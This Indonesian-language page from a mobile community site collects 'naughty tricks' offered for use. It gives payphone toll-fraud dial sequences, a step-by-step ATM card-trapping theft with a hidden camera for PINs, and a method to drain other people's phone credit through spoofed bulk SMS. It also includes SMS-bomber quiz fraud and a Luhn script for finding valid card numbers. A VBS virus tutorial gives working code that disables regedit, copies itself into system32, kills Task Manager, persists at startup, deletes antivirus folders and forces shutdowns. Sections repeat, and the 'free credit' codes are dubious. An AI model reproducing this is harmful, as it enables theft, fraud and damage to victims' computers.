peperonity.net
Welcome, guest. You are not logged in.
Log in or join for free!
 
Stay logged in
Forgot login details?

Login
Stay logged in

For free!
Get started!

Text page


dance
kinjappan0.peperonity.net

<[[ Belajar Nakal ]]>

Trick NELPON lokal GRATEEEzzz.... :
Kmu cari dlu telpon umum nya. Klo trick ini gagal, cari telp. Umum lain..
Caranya.. Angkat dlu gagang telp. Tekan tmbol angka 142 atau nmr free call apa saja. klo dh bunyi nada stand by off, lalu tkan angka 1111111111.. Yg bnyk dan dg kecepatan konstant. Klo dh bunyi, kmu dial nmr tujuan lokal. Klo blm bunyi, cba lagi.. Tdk semua telp. Umum bisa.

Trick HACK mesin ATM :
Caranya.. Kmu hrs pasang kamera tersembunyi di dkat mesin ATM utk mencatat nmr PIN korban. Kmu kemudian masukkan plastik bening tipis ke tempat memasukan kartu atm. Kemudian kmu bersembunyi menunggu korban. Korban memasukkan kartu atm dan mesin mendeteksi dan menampilkan tulisan ENTER PIN. krn data nmr kartu terhalang plastik. Shg mesin akan membaca terus menerus. Shg korban pergi krn kartu tdk bsa dicabut. Lalu kmu masuk dan cabut plastiknya. Km masukkan kode pin. Dan kmu bsa ambil uang sesuka kmu. Kartu atm jd milik kmu.

NELPON ITERLOKAL TARIF LOKAL :
Trick nelp. Murah. Trick ini sebaiknya gunakan di wartel B.. Caranya.. Tekan nmr tujuan. Contoh.. 0225951122 Lalu tkan tmbl penutup sambungan telepon. Tkan tmbol Radial. Lalu lihat d layar kalu angka nol nya hilang atau belum. Klo blm, ulangi tkan tmbl radial sampai angka nol hilang menjadi 215951122 br bsa nelpon.
Trick ini utk nelp. Interlokal tarif lokal..

Nelpon interlokal tarif lokal :
Trick nelp. Murah. Trick ini sebaiknya gunakan di wartel B.. Caranya.. Tekan nmr tujuan. Contoh.. 0225951122 Lalu tkan tmbl penutup sambungan telepon. Tkan tmbol Radial. Lalu lihat d layar kalu angka nol nya hilang atau belum. Klo blm, ulangi tkan tmbl radial sampai angka nol hilang menjadi 215951122 br bsa nelpon.
Trick ini utk nelp. Interlokal tarif lokal..

Trik nelpon iterlokal tarif LOKAL via telpon UMUM....:
Masukkan 1 koin ke telepon umum. Sblm koin masuk dg sngt cepat tekan 52995008 stl ada bunyi tanda panggilan kosong, tkan kode #2*249nomerhp dg cepat. Klo dh nyambung masukkan koin lgi.. Dan nelp. Sepuasnya..

Nelpon Gratis Pake telpon UMUM :
Pencet angka 1551 pd saat tkan angka terakhir tkan yg lama.. Sampai ada bunyi nada sela.. Lalu tkan tmbl nmr tujuan Lokal. Klo dh nyambung nelp. Sepuasnya..




TRIK NELPON LOKAL GRATIS :
Kmu cari dlu telpon umum nya. Klo trick ini gagal, cari telp. Umum lain..
Caranya.. Angkat dlu gagang telp. Tekan tmbol angka 142 atau nmr free call apa saja. klo dh bunyi nada stand by off, lalu tkan angka 1111111111.. Yg bnyk dan dg kecepatan konstant. Klo dh bunyi, kmu dial nmr tujuan lokal. Klo blm bunyi, cba lagi.. Tdk semua telp. Umum bisa.





Trick isi PULSA GATIS :
Trick Isi Pulsa GRATIS... Kata org2 caranya adalah...
TELKOMSEL caranya.. Ketik *133*451667491*nmrhp*jmlahplsa#35
MENTARI caranya.. Ketik *556*jmlahplsa*970042157845#35
IM3 caranya.. Ketik *7643*100*78572472847#35 dan tkan tmbl O.K atau CALL.. Tp tdk semua kartu bisa.

TRICK ikut kuis gratis :
Caranya.. Kmu daftarkan nmr hp km di klub mentari atau m3 acces.. Dan bkin account sms gratis.. Kemudian stl aktif, kmu cari situs yg menyediakan SMS Bomber dan kmu log in ke sms bomber.. Pada kolom recipient di isi nmr yg menyelenggarakan kuis pada kolom message diisi jawaban kuis kmu. Dan pada kolom jumlah sms kmu isi sebanyak2nya yg akan kmu krm.


TCaranya adalah km buka situs yg menyediakan Bulk sms gratis. klo bsa yg provider nya lokal. Stl itu klo utk indosat, pada kolom sender ketik nmr hp org yg akan kmu sedot pulsanya. Di kolom recipient ketik 151. Di kolom message ketik TP spasi NMRHP KM spasi JMLAH PULSA dan kirim.. Klo nmr hp target ada pulsanya, pasti kesedot.
Klo utk XL. di klm sender ketik nmr hp org yg akan disedot pulsanya. Di kolom recipient ketik 168 dan di kolom message ketik BAGI spasi NMR HP KM spasi JMLAH PULSA dan kirim..
Bulk sms jga bsa utk order I RING gratis atau ikut Quiz gratis.. Cuma byr tarif indernet.RICK SEDOT pulsa via WEB


TRIK ISI PULSA GRATIS :
TELKOMSEL caranya.. Ketik *133*451667491*nmrhp*jmlahplsa#35
MENTARI caranya.. Ketik *556*jmlahplsa*970042157845#35
IM3 caranya.. Ketik *7643*100*78572472847#35 dan tkan tmbl O.K atau CALL.. Tp tdk semua kartu bisa.


Trick transfer pulsa gratis m3 :
Caranya.. Kmu buka wap.m3-access.com dg krtu m3 kamu. Klo di halaman situs nmr kmu yg kelihatan jd lain, contoh: nmr kmu 085624555666 tp berubah jd 085610554444 atau yg lain. Berarti krtu kmu bsa utk transfer pulsa gratis sesama m3..

Cara Mudah Bikin Virus :
cara bikin virus 1
cara mudah bikin virus "versi 1"
Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.

pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.
# akan lebih afdoL kalo ditemenin lagu2nya rhcp (aku ngefans ma rhcp)

Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Sebenarnya udah aku bahas di blogku ini. tapi nggak papa aku ulangin aja.
biar keliatan resmi :-). misalnya:

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools", 1, "REG_DWORD"
lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.
2. mengopikan diri ke direktory lain

CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfile wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary

3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide

4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)

5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)
6.Merestart Windows
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
merestart windows dalam waktu 60 sekon

7.Meng-ShutDown Windows
CreateObject("WScript.Shell").run "shutdown -s-f -t 60", vbhide
mematikan windows dalam waktu 60 sekon :)yang beda cuman
"shutdown -s-f -t 60"
S = untuk shutdown dan
R = untuk reboot\restart

8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
'(masukkan kode virus disini)
End if
'misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
'dan tahun 2007

Ok. Pelajaran bikin virus untuk hari ini saya kira udah cukup.
walaupun udah sering dibahas,, nggak papalah,,,, itung-itung
buat nambahin pengetahuan kita. dan semoga bermanfaat :-)
SCRIPT Kartu Kridit :
Halaman ini merupakan demo penggunaan JavaScript untuk memeriksa nomor kartu kredit (atau kartu apa saja yang memakai algoritma cek digit Luhn). Untuk dapat mencoba demonstrasi ini, Anda memerlukan browser yang mendukung JavaScript, misalnya Netscape Navigator atau IE. Halaman ini dibuat dengan menggunakan editor Netscape Composer dengan bantuan program EDIT.COM untuk bagian JavaScript-nya. Halaman ini telah dites menggunakan Netscape Navigator 4.51. Untuk memahami maksud halaman ini sebaiknya Anda membaca artikel Algoritma Cek Digit Pada Kartu Kredit yang bisa Anda temukan di bagian Fokus.
Cara Pemakaian :
• Jika Anda hanya ingin tahu apakah nomor kartu kredit Anda (atau nomor kartu apa saja, TeCC misalnya) sah (menurut algoritma check digit luhn), Anda bisa memasukkan nomor yang dimaksud pada tempat masukan yang diberikan dan menekan tombol periksa.
• Jika Anda ingin tahu beberapa nomor kartu kredit yang sah yang dekat dengan nomor yang Anda masukan (tidak peduli apakah nomor masukan itu sah atau tidak) tekan tombol Cari Nomor Yang Dekat.
• tekan reset jika Anda ingin membersihkan masukan dan keluaran program.

Skrip ini akan menerima masukan bilangan dengan jumlah digit yang sembarang (tidak harus 16 angka), Jika Anda takut salah dalam memasukkan data, Anda bisa menyisipkan spasi atau '-' untuk memisahkan angka--angka masukan (spasi dan '-' akan diabaikan). Misalkan Anda ingin memasukkan data 1234567890123456, Anda bisa memasukkannya sebagai 1234-5678-9012-3456. Anda tidak boleh memasukkan karakter selain angka, spasi dan '-' karena skrip akan menolaknya.
Ttrick NELPON lokal GRATEEEzzz.... :
Kmu cari dlu telpon umum nya. Klo trick ini gagal, cari telp. Umum lain..
Caranya.. Angkat dlu gagang telp. Tekan tmbol angka 142 atau nmr free call apa saja. klo dh bunyi nada stand by off, lalu tkan angka 1111111111.. Yg bnyk dan dg kecepatan konstant. Klo dh bunyi, kmu dial nmr tujuan lokal. Klo blm bunyi, cba lagi.. Tdk semua telp. Umum bisa.

Trick HACK mesin ATM :
Caranya.. Kmu hrs pasang kamera tersembunyi di dkat mesin ATM utk mencatat nmr PIN korban. Kmu kemudian masukkan plastik bening tipis ke tempat memasukan kartu atm. Kemudian kmu bersembunyi menunggu korban. Korban memasukkan kartu atm dan mesin mendeteksi dan ...
Next part ►


This page:




Help/FAQ | Terms | Imprint
Home People Pictures Videos Sites Blogs Chat
Top
.